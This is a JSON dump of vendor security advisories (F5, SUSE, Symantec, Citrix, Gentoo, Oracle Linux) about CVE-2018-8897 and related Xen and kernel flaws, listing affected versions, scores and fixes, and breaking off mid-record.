[{"lastseen": "2020-04-06T22:39:41", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "\nF5 Product Development has assigned ID 719554 (BIG-IP), ID 719747 (BIG-IQ and F5 iWorkflow), and ID 719744 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H17403481 on the **Diagnostics** &gt; **Identified** &gt; **Medium** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 14.x | 14.0.0 | 14.1.0 \n14.0.0.3 | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \n13.x | 13.0.0 - 13.1.1 | 13.1.1.2 \n12.x | 12.1.0 - 12.1.3 | 12.1.3.7 \n11.x | 11.6.0 - 11.6.3 \n11.2.1 - 11.5.8 | 11.6.3.3 \n11.5.9 \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \nBIG-IQ Centralized Management | 6.x | 6.0.0 - 6.0.1 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \n5.x | 5.0.0 - 5.4.0 | None \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \nF5 iWorkflow | 2.x | 2.0.2 - 2.3.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \n4.x | 4.4.0 | None \n \n1 The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2019-03-12T19:44:00", "published": "2018-05-15T07:59:00", "id": "F5:K17403481", "href": "https://support.f5.com/csp/article/K17403481", "title": "Linux kernel vulnerability CVE-2018-8897", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2018-05-11T18:07:08", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897"], "description": "This update for xen fixes several issues.\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n These non-security issues were fixed:\n\n - bsc#1086039: Ensure that Dom0 does represent DomU cpu flags correctly\n - bsc#1027519: Fixed shadow mode guests\n\n", "edition": 1, "modified": "2018-05-11T15:07:06", "published": "2018-05-11T15:07:06", "id": "SUSE-SU-2018:1216-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00018.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-05-09T20:03:45", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "description": "This update for xen fixes several issues.\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7550: The load_multiboot function allowed local guest OS users\n to execute arbitrary code on the host via a mh_load_end_addr value\n greater than mh_bss_end_addr, which triggers an out-of-bounds read or\n write memory access (bsc#1083292).\n\n These non-security issues were fixed:\n\n - bsc#1072834: Prevent unchecked MSR access error\n - bsc#1035442: Increase the value of LIBXL_DESTROY_TIMEOUT from 10 to 100\n seconds, allowing for more domUs to be shutdown in parallel\n - bsc#1057493: Prevent DomU crash\n\n", "edition": 1, "modified": "2018-05-09T18:16:20", "published": "2018-05-09T18:16:20", "id": "SUSE-SU-2018:1181-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00012.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-05-10T20:05:33", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "description": "This update for xen fixes several issues.\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7550: The load_multiboot function allowed local guest OS users\n to execute arbitrary code on the host via a mh_load_end_addr value\n greater than mh_bss_end_addr, which triggers an out-of-bounds read or\n write memory access (bsc#1083292).\n\n", "edition": 1, "modified": "2018-05-10T18:07:13", "published": "2018-05-10T18:07:13", "id": "SUSE-SU-2018:1202-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00014.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-05-09T20:03:45", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "description": "This update for xen fixes several issues.\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7550: The load_multiboot function allowed local guest OS users\n to execute arbitrary code on the host via a mh_load_end_addr value\n greater than mh_bss_end_addr, which triggers an out-of-bounds read or\n write memory access (bsc#1083292).\n\n This non-security issue was fixed:\n\n - bsc#1072834: Prevent unchecked MSR access error\n - bsc#1057493: Prevent DomU crashes\n - bsc#1086107: Fixed problems with backports for XSA-246 and XSA-247\n\n", "edition": 1, "modified": "2018-05-09T18:08:03", "published": "2018-05-09T18:08:03", "id": "SUSE-SU-2018:1177-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00011.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-05-11T00:06:02", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "description": "This update for xen fixes several issues.\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7550: The load_multiboot function allowed local guest OS users\n to execute arbitrary code on the host via a mh_load_end_addr value\n greater than mh_bss_end_addr, which triggers an out-of-bounds read or\n write memory access (bsc#1083292).\n\n", "edition": 1, "modified": "2018-05-10T21:07:16", "published": "2018-05-10T21:07:16", "id": "SUSE-SU-2018:1203-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00015.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-06-01T16:39:47", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10981", "CVE-2018-10982", "CVE-2018-3639"], "description": "This update for xen fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-3639: Spectre V4 \u00e2\u0080\u0093 Speculative Store Bypass aka &quot;Memory\n Disambiguation&quot; (bsc#1092631)\n\n This feature can be controlled by the &quot;ssbd=on/off&quot; commandline flag for\n the XEN hypervisor.\n - CVE-2018-10982: x86 vHPET interrupt injection errors (XSA-261\n bsc#1090822)\n - CVE-2018-10981: qemu may drive Xen into unbounded loop (XSA-262\n bsc#1090823)\n\n Other bugfixes:\n\n - Upstream patches from Jan (bsc#1027519)\n - additional fixes related to Page Table Isolation (XPTI). (bsc#1074562\n XSA-254)\n - qemu-system-i386 cannot handle more than 4 HW NICs (bsc#1090296)\n\n This update was imported from the SUSE:SLE-12-SP3:Update update project.\n\n", "edition": 1, "modified": "2018-06-01T15:08:06", "published": "2018-06-01T15:08:06", "id": "OPENSUSE-SU-2018:1487-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00002.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-05-12T02:43:24", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-7540", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-7542", "CVE-2018-7541", "CVE-2018-8897"], "description": "This update for xen to version 4.9.2 fixes several issues.\n\n This feature was added:\n\n - Added script, udev rule and systemd service to watch for vcpu\n online/offline events in a HVM domU. They are triggered via 'xl vcpu-set\n domU N'\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7540: x86 PV guest OS users were able to cause a denial of\n service (host OS CPU hang) via non-preemptable L3/L4 pagetable freeing\n (bsc#1080635).\n - CVE-2018-7541: Guest OS users were able to cause a denial of service\n (hypervisor crash) or gain privileges by triggering a grant-table\n transition from v2 to v1 (bsc#1080662).\n - CVE-2018-7542: x86 PVH guest OS users were able to cause a denial of\n service (NULL pointer dereference and hypervisor crash) by leveraging\n the mishandling\n of configurations that lack a Local APIC (bsc#1080634).\n\n These non-security issues were fixed:\n\n - bsc#1087252: Update built-in defaults for xenstored in stubdom, keep\n default to run xenstored as daemon in dom0\n - bsc#1087251: Preserve xen-syms from xen-dbg.gz to allow processing\n vmcores with crash(1)\n - bsc#1072834: Prevent unchecked MSR access error\n\n This update was imported from the SUSE:SLE-12-SP3:Update update project.\n\n", "edition": 1, "modified": "2018-05-12T00:37:01", "published": "2018-05-12T00:37:01", "id": "OPENSUSE-SU-2018:1274-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00059.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 6.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}}, {"lastseen": "2018-05-10T00:04:02", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-7540", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-7542", "CVE-2018-7541", "CVE-2018-8897"], "description": "This update for xen to version 4.9.2 fixes several issues.\n\n This feature was added:\n\n - Added script, udev rule and systemd service to watch for vcpu\n online/offline events in a HVM domU. They are triggered via 'xl vcpu-set\n domU N'\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7540: x86 PV guest OS users were able to cause a denial of\n service (host OS CPU hang) via non-preemptable L3/L4 pagetable freeing\n (bsc#1080635).\n - CVE-2018-7541: Guest OS users were able to cause a denial of service\n (hypervisor crash) or gain privileges by triggering a grant-table\n transition from v2 to v1 (bsc#1080662).\n - CVE-2018-7542: x86 PVH guest OS users were able to cause a denial of\n service (NULL pointer dereference and hypervisor crash) by leveraging\n the mishandling\n of configurations that lack a Local APIC (bsc#1080634).\n\n These non-security issues were fixed:\n\n - bsc#1087252: Update built-in defaults for xenstored in stubdom, keep\n default to run xenstored as daemon in dom0\n - bsc#1087251: Preserve xen-syms from xen-dbg.gz to allow processing\n vmcores with crash(1)\n - bsc#1072834: Prevent unchecked MSR access error\n\n", "edition": 1, "modified": "2018-05-09T21:09:32", "published": "2018-05-09T21:09:32", "id": "SUSE-SU-2018:1184-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00013.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 6.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}}], "symantec": [{"lastseen": "2018-05-08T23:57:19", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. An attacker can exploit this issue to execute arbitrary code with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1709 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "SMNTC-104071", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/104071", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2018-8897 Local Privilege Escalation Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "citrix": [{"lastseen": "2020-12-24T11:42:53", "bulletinFamily": "software", "cvelist": ["CVE-2017-5754", "CVE-2018-10892", "CVE-2018-10982", "CVE-2018-8897"], "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"DescriptionofProblem\"> Description of Problem</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<p>A number of security vulnerabilities have been identified in Citrix XenServer that may allow malicious code running in a PV guest VM to compromise the host and malicious privileged code running in an HVM guest VM to crash the host.</p>\n<p>These vulnerabilities affect all currently supported versions of Citrix XenServer up to and including Citrix XenServer 7.4.</p>\n<p>The following vulnerabilities have been addressed:</p>\n<p>CVE-2017-5754: (High) Rogue data cache load, memory access permission check performed after kernel memory read</p>\n<p>CVE-2018-10982: (Medium) x86: vHPET interrupt injection errors</p>\n<p>CVE-2018-8897: (High) x86: mishandling of debug exceptions</p>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"MitigatingFactors\"> Mitigating Factors</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<p>Customers with only HVM guest VMs with no untrustworthy privileged code running have mitigated these issues. Note that all Windows VMs are HVM guest VMs.</p>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"WhatCustomersShouldDo\"> What Customers Should Do</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<p>Hotfixes have been released to address these issues. Citrix strongly recommends that affected customers install these hotfixes as soon as possible. The hotfixes can be downloaded from the following locations:</p>\n<p>Citrix XenServer 7.4: CTX234440 \u2013 <a href=\"https://support.citrix.com/article/CTX234440\">https://support.citrix.com/article/CTX234440</a> </p>\n<p>Citrix XenServer 7.3: CTX234439 \u2013 <a href=\"https://support.citrix.com/article/CTX234439\">https://support.citrix.com/article/CTX234439</a> </p>\n<p>Citrix XenServer 7.1 LTSR CU1: CTX234437 \u2013 <a href=\"https://support.citrix.com/article/CTX234437\">https://support.citrix.com/article/CTX234437</a> </p>\n<p>Citrix XenServer 7.0: CTX234436 \u2013 <a href=\"https://support.citrix.com/article/CTX234436\">https://support.citrix.com/article/CTX234436</a> </p>\n<p>Citrix XenServer 6.5 SP1: CTX234435 \u2013 <a href=\"https://support.citrix.com/article/CTX234435\">https://support.citrix.com/article/CTX234435</a> </p>\n<p>Citrix XenServer 6.2 SP1: CTX234434 \u2013 <a href=\"https://support.citrix.com/article/CTX234434\">https://support.citrix.com/article/CTX234434</a> </p>\n<p>Citrix XenServer 6.0.2 Common Criteria: CTX234433 \u2013 <a href=\"https://support.citrix.com/article/CTX234433\">https://support.citrix.com/article/CTX234433</a> </p>\n<p>In addition, following the publication of CVE-2017-5754, Citrix committed to provide mitigations for this issue for the Citrix XenServer 7.2 release which is now End of Life. A hotfix for this release is available at Citrix XenServer 7.2: CTX234438 \u2013 <a href=\"https://support.citrix.com/article/CTX234438\">https://support.citrix.com/article/CTX234438</a> </p>\n<p>Note that, in line with previous statements, the hotfixes for the 6.x versions of Citrix XenServer do not include mitigations for CVE-2017-5754.</p>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"WhatCitrixIsDoing\"> What Citrix Is Doing</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix is notifying customers and channel partners about this potential security issue. This article is also available from the Citrix Knowledge Center at <u> <a href=\"http://support.citrix.com/\">http://support.citrix.com/</a></u>.</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"ObtainingSupportonThisIssue\"> Obtaining Support on This Issue</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"https://www.citrix.com/support/open-a-support-case.html\">https://www.citrix.com/support/open-a-support-case.html</a></u>. </p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"ReportingSecurityVulnerabilities\"> Reporting Security Vulnerabilities</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"http://support.citrix.com/article/CTX081743\">Reporting Security Issues to Citrix</a></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"Changelog\"> Changelog</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<table border=\"1\" cellpadding=\"1\" cellspacing=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td>Date </td>\n<td>Change</td>\n</tr>\n<tr>\n<td>8th May 2018</td>\n<td>Initial Publication</td>\n</tr>\n<tr>\n<td>11th May 2018</td>\n<td>Updated missing CVE identifier CVE-2018-10892</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n</div></div>\n</section>", "modified": "2018-05-11T04:00:00", "published": "2018-05-08T04:00:00", "id": "CTX234679", "href": "https://support.citrix.com/article/CTX234679", "type": "citrix", "title": "Citrix XenServer Multiple Security Updates", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2018-10-31T00:03:19", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-7540", "CVE-2017-5753", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-15468", "CVE-2018-10981", "CVE-2018-7542", "CVE-2018-12892", "CVE-2018-15470", "CVE-2018-3646", "CVE-2017-5715", "CVE-2018-12893", "CVE-2018-3620", "CVE-2018-7541", "CVE-2018-15469", "CVE-2018-10982", "CVE-2018-5244", "CVE-2018-12891"], "description": "### Background\n\nXen is a bare-metal hypervisor.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Xen. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nA local attacker could cause a Denial of Service condition or disclose sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Xen users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-emulation/xen-4.10.1-r2\"", "edition": 1, "modified": "2018-10-30T00:00:00", "published": "2018-10-30T00:00:00", "id": "GLSA-201810-06", "href": "https://security.gentoo.org/glsa/201810-06", "title": "Xen: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "kernel-uek\n[3.8.13-118.20.7]\n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) {CVE-2018-8897}", "edition": 5, "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "ELSA-2018-4098", "href": "http://linux.oracle.com/errata/ELSA-2018-4098.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:38", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "[2.6.18-419.0.0.0.11]\n- x86_64/entry: Don't use IST entry for #BP stack [orabug 28452062] {CVE-2018-8897}", "edition": 3, "modified": "2018-09-18T00:00:00", "published": "2018-09-18T00:00:00", "id": "ELSA-2018-4219", "href": "http://linux.oracle.com/errata/ELSA-2018-4219.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:33", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "[2.6.39-400.298.7]\n- net/rds: Fix endless RNR situation (Hakon Bugge) [Orabug: 27645402] \n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) {CVE-2018-8897}", "edition": 5, "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "ELSA-2018-4097", "href": "http://linux.oracle.com/errata/ELSA-2018-4097.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:21", "bulletinFamily": "unix", "cvelist": ["CVE-2018-1087", "CVE-2018-8897"], "description": "[4.1.12-124.14.5]\n- vhost/scsi: fix reuse of &vq->iov[out] in response (Benjamin 